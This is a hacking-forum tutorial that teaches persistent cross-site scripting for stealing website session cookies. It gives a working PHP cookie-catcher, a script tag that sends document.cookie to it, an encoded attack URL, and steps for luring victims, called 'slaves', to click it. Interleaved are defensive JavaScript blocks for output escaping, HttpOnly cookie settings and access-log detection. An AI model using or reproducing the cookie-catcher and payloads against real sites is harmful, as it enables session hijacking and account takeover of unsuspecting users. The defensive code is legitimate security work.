Hello Guys !
This is Hacker Cyc|0ne.
I am going to teach you how to hack a website through XSS (Persistent Cross Site Scripting).
I wrote it because I didn't find a nice tut to explain XSS. I didn't add many pics as I don't want to hack a website just for a tut. But this is pretty easy and you will learn it without much difficulty.
“ Something about XSS “ :-
XSS is basically using JavaScript in different forms to get hold of a user's session details on the respective website. With the help of XSS we can steal the cookies of the owner of the website.
XSS is a very large concept and your success rate depends on your imagination and experience.
SQL injection and keylogging are the kind of things where you follow certain steps to execute something.
XSS, on the other hand, is about understanding the ways JavaScript can be used,
and the vulnerable spots of the website where your JavaScript can be executed may be in different places.
So I could say that XSS, or Cross Site Scripting, means taking advantage of web applications that take user input but don't filter it properly. This allows an attacker to inject HTML or other code to get some hidden information out of it. The most common information people look for with
XSS is cookies. Cookies are used to maintain user authentication on the respective website.
“ XSS “ :-
* Search terms :- Almost all websites have a search box where you can try to search for something on the website.
In the search box you can type your malicious script and check for the vulnerability.
* Text boxes :- Any type of text box on the website which basically lets you
put some input into it.
So we are trying to find a place where we can write something which will later be shown on the same webpage.
“ Types of XSS “ :-
There are 2 types of XSS vulnerability:
1. Persistent Cross Site Scripting
2. Non-persistent Cross Site Scripting.
Let's start with Persistent Cross Site Scripting.
“ Persistent Cross Site Scripting “ :-
A Persistent Cross Site Scripting vulnerability is one where the malicious code you inject is stored permanently on the respective website. To understand it better, I will give you a little example.
Suppose you found a forum which is vulnerable to XSS. Then you can make a “New Topic” or “New Thread” in the forum. Every time some user or the admin opens up that particular thread, your code would be executed, because it wasn't filtered due to the lack of security on the website, and the user's or admin's cookies would be sent to you via a “cookie catcher”, which is a .php file stored on your own website. This website could be on a free hosting service.
Let's suppose we have http://www.Cycl0ne.com.
It's just for example, and actually Cycl0ne's website doesn't exist! =P
“ Checking for Vulnerability “ :-
Now, the very first thing we will have to find is a place where we can input some text,
which will later be displayed.
As an example of a secure site, on Hackforums.com we have a search bar, so in the search bar let's
put “<u>Cycl0ne” and hit enter.
You will see that it says “Sorry, but no results were returned using the query information you provided.
Please redefine your search terms and try again.”.
But you should notice here that it doesn't say “No search results found for “<u>Cycl0ne””.
So it means that it is not echoing the word that we put into the search bar.
So there is no chance to exploit the search bar of Hackforums.
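The echo test above (does the page reflect “<u>Cycl0ne” as live markup, as plain text, or not at all?) is exactly the check a developer can turn into a regression test. The following Node.js script is an added example, not code from this tutorial: the three renderers (renderSearchUnsafe, renderSearchSafe, renderSearchNoEcho) are hypothetical page templates, and the probe string is the one used above.

```javascript
// Added example (not from the original tutorial): the "<u>Cycl0ne" probe as an
// automated check. The three render* functions are hypothetical page templates
// standing in for a site's search-results page.

// Encode the characters that can switch HTML context, so user input is
// displayed as text and never parsed as tags or attributes.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable renderer: echoes the search term straight into the page.
function renderSearchUnsafe(term) {
  return '<p>No search results found for "' + term + '"</p>';
}

// Fixed renderer: same page, but the term is encoded before it lands in HTML.
function renderSearchSafe(term) {
  return '<p>No search results found for "' + escapeHtml(term) + '"</p>';
}

// A renderer that, like the Hackforums search described above, never echoes
// the query at all.
function renderSearchNoEcho(_term) {
  return '<p>Sorry, but no results were returned using the query information you provided.</p>';
}

// The probe from the tutorial: harmless markup that is easy to spot in output.
const PROBE = '<u>Cycl0ne';

// True when the renderer reflects the probe's tag back as live markup.
// This is the manual "does it echo <u> unescaped?" check, automated.
function reflectsRawMarkup(render) {
  return render(PROBE).includes('<u>');
}

// True when the probe text appears in the output at all (escaped or not).
// Distinguishes "echoes safely" from "does not echo".
function echoesInput(render) {
  return render(PROBE).includes('Cycl0ne');
}

// Run the check against each renderer and report the result.
function classify(render) {
  if (!echoesInput(render)) return 'no-echo';
  return reflectsRawMarkup(render) ? 'reflects-raw-markup' : 'echoes-encoded';
}

for (const [name, render] of Object.entries({ renderSearchUnsafe, renderSearchSafe, renderSearchNoEcho })) {
  console.log(name + ': ' + classify(render));
}
```

escapeHtml is correct for text nodes and for double-quoted attribute values; input placed inside a script block, a URL, or a CSS value needs a different encoder for that context, which is why “just escape it” is not a complete fix on its own.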
“ Testing Java Scripts “ :-
Now, once we know that a website is vulnerable to XSS (it echoes our input),
we will try to run a small JavaScript on the website.
<script type="text/javascript"> alert('Cycl0ne') </script>
So what this will do is pop up a little alert box saying “Cycl0ne”.
And if it does that, it means that the site accepts JavaScript input as well.
Remember: you can also use – <script type="text/javascript"> alert('your Name') </script>
It will show something like –
Once you're done, just click on the “Ok” or “Preview” button at the bottom.
And on the next page you should get a popup that says “Cycl0ne”.
“ Finding Cookies “ :-
Now, since we have seen that the website IS accepting JavaScript input and executing it on the next page, let's try to do something else with the JavaScript. First of all, I want you guys to understand what cookies are and where you find them. Type the following command into the address bar of your web browser.
javascript:alert(document.cookie)
As soon as you type that command and hit enter on the keyboard, it should make a popup which shows you your cookies for the respective website. Make sure you are logged in to check your cookies. As I said before, cookies are the things which hold the session information and log you in every time you visit the website.
By doing this you can see your own cookies, but it would not help an attack UNLESS we find some way to get those cookies sent to us.
Now, let's try to find a way to get these cookies sent to us with the help of JavaScript.
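The reason document.cookie works in the address bar is that the session cookie was set without the HttpOnly attribute. The server-side fix is to set session cookies with HttpOnly (hidden from script), Secure (HTTPS only) and SameSite. This Node.js snippet is an added example, not from the tutorial: it builds such a Set-Cookie header, parses headers back, lists which protections a cookie is missing, and simulates what document.cookie would expose. The cookie name sid and the sample headers are constructed for illustration.

```javascript
// Added example (not from the original tutorial): session-cookie attributes
// that keep the cookie out of reach of document.cookie. Cookie names and the
// sample Set-Cookie headers below are constructed.

// Build a Set-Cookie header for a session id with the defensive attributes.
// Name and value are validated so no attribute can be smuggled in.
function sessionCookieHeader(name, value, maxAgeSeconds) {
  if (!/^[\w-]+$/.test(name) || /[;,\s]/.test(value)) {
    throw new Error('invalid cookie name or value');
  }
  return name + '=' + value + '; Max-Age=' + maxAgeSeconds +
    '; Path=/; HttpOnly; Secure; SameSite=Lax';
}

// Parse one Set-Cookie header into name, value and a lowercase attribute map.
// Flag attributes (HttpOnly, Secure) map to true; valued ones keep their value.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(';').map((s) => s.trim());
  const eq = pair.indexOf('=');
  const attributes = {};
  for (const a of attrs) {
    const i = a.indexOf('=');
    const key = (i === -1 ? a : a.slice(0, i)).toLowerCase();
    attributes[key] = i === -1 ? true : a.slice(i + 1);
  }
  return { name: pair.slice(0, eq), value: pair.slice(eq + 1), attributes };
}

// Review helper: which protections is this session cookie missing?
function missingCookieProtections(header) {
  const { attributes } = parseSetCookie(header);
  const missing = [];
  if (!attributes.httponly) missing.push('HttpOnly');
  if (!attributes.secure) missing.push('Secure');
  if (!attributes.samesite) missing.push('SameSite');
  return missing;
}

// Simulate what document.cookie returns for a set of cookies: every cookie
// without HttpOnly is visible to page script.
function scriptVisibleCookies(headers) {
  return headers
    .map(parseSetCookie)
    .filter((c) => !c.attributes.httponly)
    .map((c) => c.name + '=' + c.value)
    .join('; ');
}

// Constructed: a weak header like many old forum sessions, and the hardened one.
const WEAK_HEADER = 'sid=abc123; Path=/';
const HARDENED_HEADER = sessionCookieHeader('sid', 'abc123', 3600);

console.log('weak header missing:', missingCookieProtections(WEAK_HEADER));
console.log('document.cookie (weak):', scriptVisibleCookies([WEAK_HEADER, 'theme=dark; Path=/']));
console.log('document.cookie (hardened):', scriptVisibleCookies([HARDENED_HEADER, 'theme=dark; Path=/']));
```

HttpOnly stops the cookie-theft part of this tutorial, not the XSS itself: injected script can still make requests as the logged-in user. It belongs alongside output encoding, not instead of it.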
“ Creating Cookie Catcher “ :-
A cookie catcher is a file which you will have to upload to some web hosting account of yours, and change its permissions to 777 so it can grab the cookies. Copy the following code and paste it into your notepad.
<?php
// cookie value arrives in the "c" query parameter
$cookie = $_GET['c'];
// visitor's IP address
$ip = getenv('REMOTE_ADDR');
$date = date("j F, Y, g:i a");
// page the visitor came from
$referer = getenv('HTTP_REFERER');
// append one record to cookies.html
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: '.$ip.'<br> Date and Time: '.$date.'<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
header("Location: http://www.yoursite.com");
?>
Just a little elaboration about the script. The first statement gets the cookies.
The second statement gets the IP, the third the date and time, and the fourth the referer.
The last line sends the slave to “Yoursite.com”.
To make it a little less suspicious, you can change the link to Cycl0ne.com,
so the slave wouldn't see anything unusual. Copy the given code and put it into a notepad.
Save it as something.php. Just make sure that you change the format to “.php”.
You'll need a free webhosting account where you can upload the file. I personally use “spam.com”, so create an account there and upload this php file. Make sure that you change its permissions to “777”.
“ Testing Cookie Catcher “ :-
Now, as you guys have seen, we have been executing a little script in that page which brings
up an alert box; let's go a little more advanced. Let's try to send our own cookies to our cookie catcher.
<script>document.location="link-of-your-cookie-catcher?c=" + document.cookie</script>
“ Elaboration on the script “ :-
document.location changes the location (URL) of the page, and we have set it equal to the
link of your cookie catcher. We've added “?c=” because the catcher reads the cookie from a GET parameter.
“+ document.cookie” appends the cookies of your slave's site, so the browser visits your cookie catcher with them
and it can record them.
Now, here is the second
Let's test if it works or not. I am going to use the script that I have shown in the
“Something” page of Cycl0ne.com.
Now, if you click on Ok or Preview, it will take you to yoursite.com OR whatever you have changed
the link to in the Cookie Catcher. Now, log back in to your spam.com account, and you will
notice another file, “cookies.html”, has been added automatically.
Now, if you open up the newly created file, you will notice some cookies inside that file.
Cookie: undefined
IP: MY IP
Date and Time: 3 April, 2010, 2:03 am
Referer: http://www.cycl0ne.com/preview.php?inclination=0&company=%3Cscript%3Edocument.location%3D%22http%3A%2F%2Fwww.yoursite.spam.com%2Fcookiecatcher2.php%3Fc3D%22+%2B+document.cookies%3C%2Fscript%3E&location=whateva&countryId=9&industryId=27&person=whateva&problem=&other=&headline=whateva&incident=whateva&incidentcharsleft=1193&incident_day_select=21&incident_month_select=04&incident_year_select=2009&incident_hour_select=8&incident_min_select=30&incident_AMPM_select=AM&policyNo=&cellNo=&preview=Preview
Note: This will look a little different from actual cookies, because when I stole these,
I wasn't logged in, so if a user is logged in then you should get something a little different from this.
Now, get the “cookie editor” addon for Mozilla Firefox.
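The Referer line in the catcher output is the same request that lands in the target site's own access log: a preview.php URL carrying a percent-encoded script tag and document.cookie. That signature is easy to alert on. The following Node.js script is an added example, not from the tutorial: it parses combined-format access-log lines, decodes the URL (repeatedly, since payloads are often double-encoded) and reports which XSS indicators appear in the path or referer. The log lines, IPs and the catcher.example host are constructed.

```javascript
// Added example (not from the original tutorial): spotting encoded XSS payloads
// in a web server's access log. Log lines below are constructed; the combined
// log format is assumed.

// Strings that have no business appearing in a request URL of this site.
const INDICATORS = [
  /<script/i,
  /document\.cookie/i,
  /document\.location/i,
  /\bon\w+\s*=/i, // inline event handler such as onerror=
];

// Undo form encoding ('+' to space) and percent-encoding, up to three
// rounds, so double-encoded payloads are seen in the clear. Stops early on
// malformed sequences instead of throwing.
function normalize(s) {
  let prev = null;
  let cur = s;
  for (let i = 0; i < 3 && cur !== prev; i++) {
    prev = cur;
    try {
      cur = decodeURIComponent(cur.replace(/\+/g, ' '));
    } catch (e) {
      break;
    }
  }
  return cur;
}

// Combined log format: ip ident user [time] "method path proto" status size "referer" "agent"
const LINE_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "[^"]*"$/;

function parseLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null;
  return { ip: m[1], time: m[2], method: m[3], path: m[4], status: m[5], referer: m[6] };
}

// Indicator patterns matched in the decoded path or referer of one entry.
function xssIndicators(entry) {
  const haystack = normalize(entry.path) + ' ' + normalize(entry.referer);
  return INDICATORS.filter((re) => re.test(haystack)).map((re) => re.source);
}

// Scan a list of log lines and return the entries worth an alert.
function scanLog(lines) {
  const hits = [];
  for (const line of lines) {
    const entry = parseLine(line);
    if (!entry) continue;
    const indicators = xssIndicators(entry);
    if (indicators.length > 0) hits.push({ ip: entry.ip, time: entry.time, path: entry.path, indicators });
  }
  return hits;
}

// Constructed sample: one request like the tutorial's preview.php URL, one
// benign search, and one double-encoded probe seen only in the referer.
const SAMPLE_LOG = [
  '203.0.113.5 - - [03/Apr/2010:02:03:11 +0000] "GET /preview.php?company=%3Cscript%3Edocument.location%3D%22http%3A%2F%2Fcatcher.example%2Fc.php%3Fc%3D%22%2Bdocument.cookie%3C%2Fscript%3E&headline=test HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
  '198.51.100.7 - - [03/Apr/2010:02:04:02 +0000] "GET /search.php?q=Cycl0ne HTTP/1.1" 200 2048 "http://www.example.com/" "Mozilla/5.0"',
  '198.51.100.9 - - [03/Apr/2010:02:05:40 +0000] "POST /post.php HTTP/1.1" 302 0 "http://www.example.com/preview.php?company=%253Cscript%253Ealert(1)%253C%252Fscript%253E" "Mozilla/5.0"',
];

for (const hit of scanLog(SAMPLE_LOG)) {
  console.log(hit.time, hit.ip, hit.indicators.join(', '));
}
```

A hit on a GET to a preview page is a probe; the stored variant from the last section shows up as a POST that writes the payload into a thread, so the same scan over POST bodies (if logged) or over the stored content itself is what catches the persistent case.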
“ Stealing Actual Cookies “ :-
Till now we were our own slave; we were trying to steal our own cookies to make sure this works.
Now, let's try to get some actual victims. On the site, you may have to PREVIEW the post first and
then submit it. So the JavaScript gets executed whenever you preview it, so we cannot
submit it because the script is already executed. And maybe on other sites you can directly
submit the post, so the moment someone opens it, you will get the cookies.
When you put the script in the “NAME” field and something in the other fields and click on preview,
QUICKLY, before it redirects you to the website described in your cookie stealer,
the URL will change to something else for a moment.
That's what you will have to copy. What I copied was this.
http://cycl0ne.com/preview.php?inclination=0&company=%3Cscript%3Edocument.location%3D%22http%3A%2F%2Fwww.yoursite.spam.com%2Fcookiecatcher.php%3Fc3D%22+%2B+document.cookies%3C%2Fscript%3E&location=whatever&countryId=9&industryId=27&person=whateva&problem=&other=&headline=whateva&incident=whateva&incidentcharsleft=1193&incident_day_select=21&incident_month_select=04&incident_year_select=2009&incident_hour_select=8&incident_min_select=30&incident_AMPM_select=AM&policyNo=&cellNo=&preview=Preview
And then you just give this link to your slave, and as soon as they click on it, you get the cookies.
It is really useful because in other cases you wouldn't have to ask the victims to click on the link;
you would actually submit the report. So as soon as someone reads it, you get the cookies.